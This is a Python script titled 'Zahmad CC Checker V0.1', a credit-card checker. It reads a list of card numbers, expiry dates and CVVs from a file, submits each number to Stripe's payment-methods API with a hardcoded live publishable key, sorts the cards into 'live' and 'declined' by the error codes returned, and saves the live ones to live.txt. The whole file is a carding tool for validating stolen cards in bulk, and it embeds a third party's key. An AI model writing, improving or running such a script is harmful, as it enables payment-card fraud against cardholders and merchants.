import requests
import time
import sys
import os

# Windows için ANSI color support
if sys.platform == "win32":
    os.system("")

Z = '\033[1;31m'
F = '\033[2;32m'
B = '\033[2;36m'
X = '\033[1;33m'
C = '\033[2;35m'
W = '\033[0m'
L = '\033[1;34m'

def check_card_silent(ccn):
    headers = {
        'accept': 'application/json',
        'content-type': 'application/x-www-form-urlencoded',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    }
    
    data = (
        f'type=card'
        f'&card[number]={ccn}'
        f'&card[exp_month]=12'
        f'&card[exp_year]=2030'
        f'&key=pk_live_51O7iuGInnULAxJzo9MwrwAdd8iLqfEsrdPpNljsQwueylpttDRMOOt5gSFTfQHG8Gb3opvW8GCVMlEysl53LR4ZF00PczZWWEX'
    )
    
    try:
        response = requests.post(
            'https://api.stripe.com/v1/payment_methods',
            headers=headers,
            data=data,
            timeout=15
        )
        
        result = response.json()
        
        if 'error' in result:
            error_code = result['error'].get('code', '')
            error_msg = result['error'].get('message', 'Unknown error')
            
            if error_code == 'incorrect_number' or 'number is not a valid credit card' in error_msg.lower():
                return {'status': 'DEC', 'reason': 'Declined'}
            
            reason_map = {
                'card_declined': 'Declined',
                'insufficient_funds': 'Insufficient funds',
                'invalid_expiry_month': 'Invalid expiry',
                'invalid_expiry_year': 'Invalid expiry',
                'invalid_cvc': 'Incorrect CVV',
                'expired_card': 'Expired',
                'processing_error': 'Processing error',
            }
            
            reason = reason_map.get(error_code, error_code if error_code else 'Declined')
            return {'status': 'LIVE', 'reason': reason}
        
        elif 'id' in result:
            return {'status': 'LIVE', 'reason': 'Live'}
        
        else:
            return {'status': 'DEC', 'reason': 'Unknown error'}
        
    except Exception as e:
        return {'status': 'DEC', 'reason': f'Error: {str(e)[:30]}'}

def main():
    print(Z + "□■" * 30 + W)
    print(L + "  Zahmad CC Checker V0.1" + W)
    print(F + "□■" * 30 + W)
    print()
    
    filename = input(F + "Enter path to CC list file: " + W).strip()
    filename = filename.strip('"').strip("'")
    
    if not os.path.exists(filename):
        print(Z + f"\n[!] Error: File '{filename}' not found" + W)
        input("\nPress Enter to exit...")
        return
    
    try:
        with open(filename, 'r', encoding='utf-8', errors='ignore') as f:
            lines = f.readlines()
        
        print(F + f"[+] Loaded {len(lines)} lines from {filename}" + W)
        print(X + "[*] Starting checks..." + W)
        print()
        
        live_count = 0
        dec_count = 0
        live_cards = []
        
        for i, line in enumerate(lines, 1):
            card_input = line.strip()
            
            if not card_input:
                continue
            
            parts = card_input.split('|')
            
            if len(parts) < 4:
                current_time = time.strftime("%H:%M:%S")
                print(Z + f"[{current_time}] {card_input} -> FAIL ✗ (Invalid format)" + W)
                dec_count += 1
                continue
            
            ccn = parts[0].strip()
            mm = parts[1].strip()
            yy = parts[2].strip()
            cvv = parts[3].strip()
            
            if len(ccn) != 16 or not ccn.isdigit():
                current_time = time.strftime("%H:%M:%S")
                print(Z + f"[{current_time}] {card_input} -> FAIL ✗ (Declined)" + W)
                dec_count += 1
                continue
            
            current_time = time.strftime("%H:%M:%S")
            result = check_card_silent(ccn)
            
            if result['status'] == 'LIVE':
                live_count += 1
                live_cards.append(card_input)
                print(F + f"[{current_time}] {card_input} -> APPROVED ✓ ({result['reason']})" + W)
            else:
                dec_count += 1
                print(Z + f"[{current_time}] {card_input} -> FAIL ✗ ({result['reason']})" + W)
            
            time.sleep(0.5)
        
        output_path = os.path.join(os.path.dirname(os.path.abspath(filename)), 'live.txt')
        
        if live_cards:
            with open(output_path, 'w', encoding='utf-8') as f:
                for card in live_cards:
                    f.write(card + '\n')
            print(F + f"\n[+] Saved {len(live_cards)} LIVE cards to {output_path}" + W)
        
        print()
        print(F + "="*60 + W)
        print(F + "SUMMARY:" + W)
        print(F + f"Total Checked: {live_count + dec_count}" + W)
        print(F + f"APPROVED: {live_count}" + W)
        print(Z + f"DECLINED: {dec_count}" + W)
        print(F + "="*60 + W)
        print()
        
    except Exception as e:
        print(Z + f"\n[!] Error: {e}" + W)
    
    input("\nPress Enter to exit...")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n" + Z + "Exiting..." + W)
    except Exception as e:
        print(Z + f"\nFatal error: {e}" + W)
        input("\nPress Enter to exit...")
